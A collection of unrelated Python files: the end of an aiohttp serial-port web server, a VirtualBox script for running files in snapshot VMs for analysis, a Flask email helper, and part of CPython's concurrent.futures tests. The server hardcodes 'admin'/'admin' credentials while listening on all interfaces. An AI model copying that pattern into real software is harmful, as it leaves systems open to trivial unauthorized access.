app["GlobalWS"] = None
app['websockets'] = set()
app['psw'] = 'admin';app['uname'] = 'admin'
app.on_shutdown.append(websockets_clear)
app["threads"] = threading.Event()
app["arg"] = get_args()
# app.middlewares.append(authorize)
#logging.debug(app.router['login'].url_for())
#aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader(STATIC_DIR))
# for name, resource in app.router.named_resources().items():
# logging.debug("Name of resource:",name,"R=", resource)
return await loop.create_server(app.make_handler(), address, port)
def server_begin():
ip='0.0.0.0';port=8080
loop = asyncio.new_event_loop();
print("[server_begin]",loop) #get_event_loop get_running_loop
asyncio.set_event_loop(loop)
asyncio.run_coroutine_threadsafe(setup_server(loop, ip,port ), loop)
#asyncio.run_coroutine_threadsafe(SerialReader(loop) , loop)
print("Server ready!",ip,port)
logging.debug("Server ready!");print("Server ready!",ip,port)
try:
loop.run_forever()
except KeyboardInterrupt:
logging.debug("Shutting Down!");print("Shutting Down!")
loop.close()
def setup_serial():
loop = asyncio.new_event_loop();
asyncio.set_event_loop(loop)
loop.run_until_complete(asyncio.gather(SerialReader(loop),serialWriteLoop(1)))
#loop.run_until_complete(SerialReader(loop))
loop.run_forever()
def mainApp():
global comPort
try:
comPort = serial.Serial(port=PORT,baudrate=BAUDRATE,parity=serial.PARITY_NONE,stopbits=serial.STOPBITS_ONE,bytesize=serial.EIGHTBITS)
comPort.timeout =.1
print(sys.getsizeof(comPort))
except :
print("port already open")
threading.Thread(target=SerialReceiveThread).start()
threading.Thread(target=PeriodicWriteSerialThread,args=(20,)).start()
#threading.Thread(target=readInputThread).start()
threading.Thread(target = server_begin ).start()
#threading.Thread(target = setup_serial ).start()
#serial_threads.join()
#main_threads.join() ;
if __name__ == '__main__':
try:
mainApp()
except KeyboardInterrupt:
print('Interrupted')
# try:
# sys.exit(0)
# except SystemExit:
# os._exit(0)
"""
Calling a coroutine function returns a coroutine object.
To execute a coroutine object, use await in front of it, or await coroObj await asyncio.sleep(10)
schedule it with ensure_future() or asyncio.ensure_future(coroObj),asyncio.ensure_future(coro_function("example.com"))
create_task() asyncio.get_event_loop().create_task(coro_function("example.com"))
future is callable coroObj future = loop.create_future(), future.add_done_callback(fn)
future = loop.create_task(coroutine)
future = asyncio.ensure_future(coroutine[, loop=loop])
use an event loop in the main thread loop = asyncio.get_event_loop()
run an event loop in another thread loop = asyncio.new_event_loop() asyncio.set_event_loop(loop)
loop.run_until_complete(<future or coroutine>).
loop.run_until_complete(asyncio.wait([ ]))
loop.run_until_complete(asyncio.gather( ))
loop.run_until_complete(asyncio.gather(helloworld(), asyncio.sleep(2))) run a co-routine repeatedly for 2 seconds
to add a function to an already running event loop asyncio.ensure_future(my_coro())
async def corotinglist():
await asyncio.gather( coro2(), coro2() )
loop = asyncio.get_event_loop()
loop.run_until_complete(corotinglist())
"""
|
demo_cli.py
|
import argparse
import logging
import os
import threading
import time
import http.client
script_version = '0.11'
try:
import support_functions
import vm_functions
except ModuleNotFoundError:
print('Unable to import support_functions and/or vm_functions. Exiting.')
exit(1)
# Parse command line arguments
parser = argparse.ArgumentParser(prog='vm-automation', description=f'''VirtualBox VM automation {script_version};
https://github.com/Pernat1y/vm-automation''')
required_options = parser.add_argument_group('Required options')
required_options.add_argument('file', type=str, nargs='+', help='Path to file')
required_options.add_argument('--vms', '-v', type=str, nargs='*', required=True,
help='Space-separated list of VMs to use')
required_options.add_argument('--snapshots', '-s', type=str, nargs='*', required=True,
help='Space-separated list of snapshots to use')
main_options = parser.add_argument_group('Main options')
main_options.add_argument('--vboxmanage', default='vboxmanage', type=str, nargs='?',
help='Path to vboxmanage binary (default: %(default)s)')
main_options.add_argument('--check_version', action='store_true',
help='Check for latest VirtualBox version online (default: %(default)s)')
main_options.add_argument('--timeout', default=60, type=int, nargs='?',
help='Timeout in seconds for both commands and VM (default: %(default)s)')
main_options.add_argument('--delay', default=7, type=int, nargs='?',
help='Delay in seconds before/after starting VMs (default: %(default)s)')
main_options.add_argument('--threads', default=2, choices=range(9), type=int, nargs='?',
help='Number of concurrent threads to run (0=number of VMs, default: %(default)s)')
main_options.add_argument('--verbosity', default='info', choices=['debug', 'info', 'error', 'off'], type=str, nargs='?',
help='Log verbosity level (default: %(default)s)')
main_options.add_argument('--debug', action='store_true',
help='Print all messages. Alias for "--verbosity debug" (default: %(default)s)')
main_options.add_argument('--log', default=None, type=str, nargs='?',
help='Path to log file (default: %(default)s) (console)')
main_options.add_argument('--report', action='store_true',
help='Generate html report (default: %(default)s)')
main_options.add_argument('--record', action='store_true',
help='Record video of guest\' screen (default: %(default)s)')
main_options.add_argument('--pcap', action='store_true',
help='Enable recording of VM\'s traffic (default: %(default)s)')
main_options.add_argument('--memdump', action='store_true', help='Dump memory VM (default: %(default)s)')
main_options.add_argument('--no_time_sync', action='store_true',
help='Disable host-guest time sync for VM (default: %(default)s)')
guests_options = parser.add_argument_group('VM options')
guests_options.add_argument('--ui', default='gui', choices=['1', '0', 'gui', 'headless'], nargs='?',
help='Start VMs in GUI or headless mode (default: %(default)s)')
guests_options.add_argument('--login', '--user', default='user', type=str, nargs='?',
help='Login for guest OS (default: %(default)s)')
guests_options.add_argument('--password', default='12345678', type=str, nargs='?',
help='Password for guest OS (default: %(default)s)')
guests_options.add_argument('--remote_folder', default='desktop', choices=['desktop', 'downloads', 'documents', 'temp'],
type=str, nargs='?',
help='Destination folder in guest OS to place file. (default: %(default)s)')
guests_options.add_argument('--open_with', default='%windir%\\explorer.exe', type=str,
nargs='?', help='Absolute path to app, which will open main file (default: %(default)s)')
guests_options.add_argument('--file_args', default=None, type=str, nargs='?',
help='Argument to pass to the main file/executable (default: %(default)s)')
guests_options.add_argument('--network', default=None, choices=['on', 'off'], nargs='?',
help='State of network adapter of guest OS (default: %(default)s)')
guests_options.add_argument('--resolution', default=None, type=str, nargs='?',
help='Screen resolution for guest OS. Can be set to "random" (default: %(default)s)')
guests_options.add_argument('--mac', default=None, type=str, nargs='?',
help='Set MAC address for guest OS. Can be set to "random" (default: %(default)s)')
guests_options.add_argument('--get_file', default=None, type=str, nargs='?',
help='Get specific file from guest OS before stopping VM (default: %(default)s)')
guests_options.add_argument('--pre', default=None, type=str, nargs='?',
help='Script to run before main file (default: %(default)s)')
guests_options.add_argument('--post', default=None, type=str, nargs='?',
help='Script to run after main file (default: %(default)s)')
args = parser.parse_args()
# Main options
filename = args.file[0]
vms_list = args.vms
snapshots_list = args.snapshots
threads = args.threads
timeout = args.timeout
delay = args.delay
verbosity = args.verbosity
debug = args.debug
log = args.log
report = args.report
record = args.record
pcap = args.pcap
memdump = args.memdump
no_time_sync = args.no_time_sync
# vm_functions options
vm_functions.vboxmanage_path = args.vboxmanage
check_version = args.check_version
ui = args.ui
vm_functions.timeout = timeout
# VM options
vm_pre_exec = args.pre
vm_post_exec = args.post
vm_login = args.login
vm_password = args.password
remote_folder = args.remote_folder
open_with = args.open_with
file_args = args.file_args
vm_network_state = args.network
vm_resolution = args.resolution
vm_mac = args.mac
vm_get_file = args.get_file
# Some VirtualBox commands require full path to file
cwd = os.getcwd()
# Logging options
if debug:
verbosity = 'debug'
if log == 'off':
logging.disable()
elif verbosity in ['error', 'info', 'debug']:
log_levels = {'error': logging.ERROR,
'info': logging.INFO,
'debug': logging.DEBUG}
if log == 'console':
vm_functions.logging.basicConfig(format='%(asctime)s [%(levelname)s] %(message)s', level=log_levels[verbosity])
else:
vm_functions.logging.basicConfig(format='%(asctime)s [%(levelname)s] %(message)s', level=log_levels[verbosity],
filename=log, filemode='a')
vm_functions.logger = logging.getLogger('vm-automation')
# Show general info
def show_info():
logging.info(f'Script version: {script_version}')
vbox_version = vm_functions.virtualbox_version(strip_newline=1, strip_build=1)[1]
logging.info(f'VirtualBox version: {vbox_version}\n')
# Check for VirtualBox version
if check_version:
print(f'Script version: {script_version}')
conn = http.client.HTTPSConnection("download.virtualbox.org")
conn.request("GET", "/virtualbox/LATEST-STABLE.TXT")
r1 = conn.getresponse()
if r1.status == 200:
latest_version = r1.read().rstrip().decode("utf-8")
if latest_version == vbox_version:
logging.debug('Using latest VirtualBox version.')
else:
logging.info(f'New version of VirtualBox available: {latest_version}.')
else:
logging.warning('Unable to check for VirtualBox version.')
logging.info(f'VMs: {vms_list}')
logging.info(f'Snapshots: {snapshots_list}\n')
result = support_functions.file_info(filename)
if result[0] != 0:
logging.error('Error while processing file. Exiting.')
exit(1)
return result[1], result[2], result[3]
# Function to take screenshot on guest OS
def take_screenshot(vm, task_name):
screenshot_index = 1
while screenshot_index < 10000:
screenshot_index_zeros = str(screenshot_index).zfill(4)
if report:
screenshot_name_num = f'reports/{sha256}/{task_name}_{screenshot_index_zeros}.png'
else:
screenshot_name_num = f'{task_name}_{screenshot_index_zeros}.png'
if os.path.isfile(screenshot_name_num):
screenshot_index += 1
else:
vm_functions.vm_screenshot(vm, screenshot_name_num)
break
# Main routines
def main_routine(vm, snapshots_list):
for snapshot in snapshots_list:
task_name = f'{vm}_{snapshot}'
logging.info(f'{task_name}: Task started')
# Create directory for report
if report:
os.makedirs(f'reports/{sha256}', mode=0o444, exist_ok=True)
# Stop VM, restore snapshot
vm_functions.vm_stop(vm, ignore_status_error=1)
time.sleep(delay / 2)
result = vm_functions.vm_snapshot_restore(vm, snapshot, ignore_status_error=1)
if result[0] != 0:
# If we were unable to restore snapshot - continue to the next snapshot/VM
logging.error(f'Unable to restore VM "{vm}" to snapshot "{snapshot}". Skipping.')
vm_functions.vm_stop(vm, ignore_status_error=1)
continue
# Change MAC address
if vm_mac:
vm_functions.vm_set_mac(vm, vm_mac)
# Disable time sync
if no_time_sync:
vm_functions.vm_disable_time_sync(vm)
# Dump traffic
if pcap:
if vm_network_state == 'off':
logging.warning('Traffic dump enabled, but network state is set to \'off\'.')
if report:
pcap_file = f'{cwd}/reports/{sha256}/{vm}_{snapshot}.pcap'
else:
pcap_file = f'{cwd}/{vm}_{snapshot}.pcap'
vm_functions.vm_pcap(vm, pcap_file)
# Start VM
time.sleep(delay / 2)
result = vm_functions.vm_start(vm, ui)
if result[0] != 0:
# If we were unable to start VM - continue to the next one
logging.error(f'Unable to start VM "{vm}". Skipping.')
vm_functions.vm_stop(vm, ignore_status_error=1)
continue
# Wait for VM
time.sleep(delay)
# Set guest network state
result = vm_functions.vm_network(vm, vm_network_state)
if result[0] != 0:
vm_functions.vm_stop(vm)
continue
# Set guest resolution
vm_functions.vm_set_resolution(vm, vm_resolution)
# Start screen recording
if record:
if report:
recording_name = f'{cwd}/reports/{sha256}/{vm}_{snapshot}.webm'
else:
recording_name = f'{cwd}/{vm}_{snapshot}.webm'
recording_name = support_functions.normalize_path(recording_name)
vm_functions.vm_record(vm, recording_name)
# Run pre exec script
if vm_pre_exec:
vm_functions.vm_exec(vm, vm_login, vm_password, vm_pre_exec, open_with=open_with, file_args=file_args)
take_screenshot(vm, task_name)
else:
logging.debug('Pre exec is not set.')
# Set path to file on guest OS
remote_file_path = support_functions.randomize_filename(vm_login, filename, remote_folder)
# Upload file to VM, check if file exist and execute
result = vm_functions.vm_upload(vm, vm_login, vm_password, filename, remote_file_path)
if result[0] != 0:
take_screenshot(vm, task_name)
vm_functions.vm_stop(vm)
continue
# Check if file exist on VM
result = vm_functions.vm_file_stat(vm, vm_login, vm_password, remote_file_path)
if result[0] != 0:
take_screenshot(vm, task_name)
vm_functions.vm_stop(vm)
continue
take_screenshot(vm, task_name)
# Run file
result = vm_functions.vm_exec(vm, vm_login, vm_password, remote_file_path, open_with=open_with,
file_args=file_args)
if result[0] != 0:
take_screenshot(vm, task_name)
vm_functions.vm_stop(vm)
continue
take_screenshot(vm, task_name)
for _ in range(2):
logging.debug(f'Waiting for {timeout / 2} seconds...')
time.sleep(timeout / 2)
take_screenshot(vm, task_name)
# Check for file at the end of task
result = vm_functions.vm_file_stat(vm, vm_login, vm_password, remote_file_path)
if result[0] != 0:
logging.info('Original file does not exists anymore (melted or removed by AV).')
# Run post exec script
if vm_post_exec:
vm_functions.vm_exec(vm, vm_login, vm_password, vm_post_exec, open_with=open_with)
take_screenshot(vm, task_name)
else:
logging.debug('Post exec is not set.')
# Get file from guest
if vm_get_file:
# Normalize path and extract file name
src_path = support_functions.normalize_path(vm_get_file)
src_filename = os.path.basename(src_path)
if report:
# Place in reports directory
dst_file = f'{cwd}/reports/{sha256}/{src_filename}'
else:
# Place in current dir
dst_file = f'{cwd}/{src_filename}'
# Download file
vm_functions.vm_copyfrom(vm, vm_login, vm_password, src_path, dst_file)
# Stop recording
if record:
vm_functions.vm_record_stop(vm)
# Dump VM memory
if memdump:
if report:
memdump_file = f'{cwd}/reports/{sha256}/{vm}_{snapshot}.dmp'
else:
memdump_file = f'{cwd}/{vm}_{snapshot}.dmp'
vm_functions.vm_memdump(vm, memdump_file)
# Stop VM
vm_functions.vm_stop(vm)
# Save html report as ./reports/<file_hash>/index.html
if report:
support_functions.html_report(vm, snapshot, filename, file_args, file_size, sha256, md5, timeout,
vm_network_state)
logging.info(f'{task_name}: Task finished')
if 'all' in vms_list:
# If vms_list is set to 'all', obtain list of all available VMs and use them
vms_list = vm_functions.list_vms()
# Autodetect snapshots
if 'all' in snapshots_list:
snapshots_autodetect = True
else:
snapshots_autodetect = False
# Number of concurrent threads
if threads == 0:
threads = len(vms_list)
logging.debug(f'Threads count is set to number of VMs: {threads}')
else:
if threads > len(vms_list):
logging.warning(f'Number of concurrent threads is larger then number of available VMs ({len(vms_list)}).')
threads = len(vms_list)
logging.debug(f'Threads count is set to {threads}')
# Show file information
sha256, md5, file_size = show_info()
# Start threads
for vm in vms_list:
# Limit number of concurrent threads
while threading.active_count() - 1 >= threads:
time.sleep(delay / 2)
if snapshots_autodetect:
logging.debug('Snapshots list will be obtained from VM information.')
snapshots_list = vm_functions.list_snapshots(vm)
if snapshots_list[0] == 0:
snapshots_list = snapshots_list[1]
else:
logging.error(f'Unable to get list of snapshots for VM "{vm}". Skipping.')
continue
try:
t = threading.Thread(target=main_routine, args=(vm, snapshots_list))
t.name = f'{vm}_{snapshots_list}'
t.start()
time.sleep(delay) # Delay before starting next VM
except (KeyboardInterrupt, SystemExit):
raise
|
email.py
|
from app import mail
from flask import current_app
from flask_mail import Message
from threading import Thread
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(current_app._get_current_object(), msg)).start()
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
|
test_concurrent_futures.py
|
from test import support
# Skip tests if _multiprocessing wasn't built.
support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
support.import_module('multiprocessing.synchronize')
from test.support.script_helper import assert_python_ok
import contextlib
import itertools
import logging
from logging.handlers import QueueHandler
import os
import queue
import sys
import threading
import time
import unittest
import weakref
from pickle import PicklingError
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future,
BrokenExecutor)
from concurrent.futures.process import BrokenProcessPool
from multiprocessing import get_context
import multiprocessing.process
import multiprocessing.util
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
INITIALIZER_STATUS = 'uninitialized'
def mul(x, y):
return x * y
def capture(*args, **kwargs):
return args, kwargs
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
def init(x):
global INITIALIZER_STATUS
INITIALIZER_STATUS = x
def get_init_status():
return INITIALIZER_STATUS
def init_fail(log_queue=None):
if log_queue is not None:
logger = logging.getLogger('concurrent.futures')
logger.addHandler(QueueHandler(log_queue))
logger.setLevel('CRITICAL')
logger.propagate = False
time.sleep(0.1) # let some futures be scheduled
raise ValueError('error in initializer')
class MyObject(object):
def my_method(self):
pass
class EventfulGCObj():
def __init__(self, mgr):
self.event = mgr.Event()
def __del__(self):
self.event.set()
def make_dummy_object(_):
return MyObject()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._thread_key = support.threading_setup()
def tearDown(self):
support.reap_children()
support.threading_cleanup(*self._thread_key)
class ExecutorMixin:
worker_count = 5
executor_kwargs = {}
def setUp(self):
super().setUp()
self.t1 = time.monotonic()
if hasattr(self, "ctx"):
self.executor = self.executor_type(
max_workers=self.worker_count,
mp_context=self.get_context(),
**self.executor_kwargs)
else:
self.executor = self.executor_type(
max_workers=self.worker_count,
**self.executor_kwargs)
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
self.executor = None
dt = time.monotonic() - self.t1
if support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 300, "synchronization issue: test lasted too long")
super().tearDown()
def get_context(self):
return get_context(self.ctx)
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolForkMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "fork"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
class ProcessPoolSpawnMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "spawn"
class ProcessPoolForkserverMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "forkserver"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
def create_executor_tests(mixin, bases=(BaseTestCase,),
executor_mixins=(ThreadPoolMixin,
ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin)):
def strip_mixin(name):
if name.endswith(('Mixin', 'Tests')):
return name[:-5]
elif name.endswith('Test'):
return name[:-4]
else:
return name
for exe in executor_mixins:
name = ("%s%sTest"
% (strip_mixin(exe.__name__), strip_mixin(mixin.__name__)))
cls = type(name, (mixin,) + (exe,) + bases, {})
globals()[name] = cls
class InitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
global INITIALIZER_STATUS
INITIALIZER_STATUS = 'uninitialized'
self.executor_kwargs = dict(initializer=init,
initargs=('initialized',))
super().setUp()
def test_initializer(self):
futures = [self.executor.submit(get_init_status)
for _ in range(self.worker_count)]
for f in futures:
self.assertEqual(f.result(), 'initialized')
class FailingInitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
if hasattr(self, "ctx"):
# Pass a queue to redirect the child's logging output
self.mp_context = self.get_context()
self.log_queue = self.mp_context.Queue()
self.executor_kwargs = dict(initializer=init_fail,
initargs=(self.log_queue,))
else:
# In a thread pool, the child shares our logging setup
# (see _assert_logged())
self.mp_context = None
self.log_queue = None
self.executor_kwargs = dict(initializer=init_fail)
super().setUp()
def test_initializer(self):
with self._assert_logged('ValueError: error in initializer'):
try:
future = self.executor.submit(get_init_status)
except BrokenExecutor:
# Perhaps the executor is already broken
pass
else:
with self.assertRaises(BrokenExecutor):
future.result()
# At some point, the executor should break
t1 = time.monotonic()
while not self.executor._broken:
if time.monotonic() - t1 > 5:
self.fail("executor not broken after 5 s.")
time.sleep(0.01)
# ... and from this point submit() is guaranteed to fail
with self.assertRaises(BrokenExecutor):
self.executor.submit(get_init_status)
def _prime_executor(self):
pass
@contextlib.contextmanager
def _assert_logged(self, msg):
if self.log_queue is not None:
yield
output = []
try:
while True:
output.append(self.log_queue.get_nowait().getMessage())
except queue.Empty:
pass
else:
with self.assertLogs('concurrent.futures', 'CRITICAL') as cm:
yield
output = cm.output
self.assertTrue(any(msg in line for line in output),
output)
create_executor_tests(InitializerMixin)
create_executor_tests(FailingInitializerMixin)
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
if __name__ == "__main__":
context = '{context}'
if context == "":
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_submit_after_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
import atexit
@atexit.register
def run_last():
try:
t.submit(id, None)
except RuntimeError:
print("runtime-error")
raise
from concurrent.futures import {executor_type}
if __name__ == "__main__":
context = '{context}'
if not context:
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(id, 42).result()
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertIn("RuntimeError: cannot schedule new futures", err.decode())
self.assertEqual(out.strip(), b"runtime-error")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._threads), 3)
for i in range(3):
sem.release()
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join()
class ProcessPoolShutdownTest(ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
call_queue = executor._call_queue
queue_management_thread = executor._queue_management_thread
del executor
# Make sure that all the executor resources were properly cleaned by
# the shutdown process
queue_management_thread.join()
for p in processes.values():
p.join()
call_queue.join_thread()
create_executor_tests(ProcessPoolShutdownTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
create_executor_tests(WaitTests,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
# Issue #31641: accept arbitrary iterables.
future1 = self.executor.submit(time.sleep, 2)
completed = [
f for f in futures.as_completed(itertools.repeat(future1, 3))
]
self.assertEqual(len(completed), 1)
def test_free_reference_yielded_future(self):
# Issue #14406: Generator should not keep references
# to finished futures.
futures_list = [Future() for _ in range(8)]
futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED))
futures_list.append(create_future(state=FINISHED, result=42))
with self.assertRaises(futures.TimeoutError):
for future in futures.as_completed(futures_list, timeout=0):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
futures_list[0].set_result("test")
for future in futures.as_completed(futures_list):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
if futures_list:
futures_list[0].set_result("test")
def test_correct_timeout_exception_msg(self):
futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE,
RUNNING_FUTURE, SUCCESSFUL_FUTURE]
with self.assertRaises(futures.TimeoutError) as cm:
list(futures.as_completed(futures_list, timeout=0))
self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished')
